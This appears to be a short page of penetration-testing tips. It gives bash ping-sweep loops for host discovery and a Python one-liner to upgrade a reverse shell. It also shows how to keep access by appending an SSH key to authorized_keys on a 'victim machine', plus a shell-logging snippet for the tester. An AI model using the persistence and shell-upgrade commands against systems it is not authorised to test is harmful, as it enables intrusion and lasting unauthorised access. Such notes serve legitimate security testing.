🫡Tips

Some tips, very useful in real life.

Ping sweep to discover hosts on the network fastly (/24)

for i in {1..255};do (ping -c 1 172.16.2.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done

Ping sweep to discover hosts on the network fastly (/16)

for j in {1..255};do for i in {1..255};do (ping -c 1 172.16.$j.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done;done

Get a proper shell on reverse shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Persistance

In case you got a reverse shell, generate RSA key :

ssh-keygen -t rsa

Paste it to authorized_keys on the victim machine :

echo XXXX >> ~/.ssh/authorized_keys

Logs all your commands

mkdir ~/.log

Then, paste the following at the end of your .zshrc file :

PS1=$'[`date  +"%d-%b-%y %T"`]%{\033[01;31m%} `ifconfig eth0 2>/dev/null | sed -n 2,2p | cut -d" " -f 10`%{\033[00m%} %{\033[01;34m%}%c%{\033[00m%} > '
test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/.log/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)

All your logs will be saved in ~/.log directory. Enjoy

PreviousPivot NextHavoc C2

Last updated 1 year ago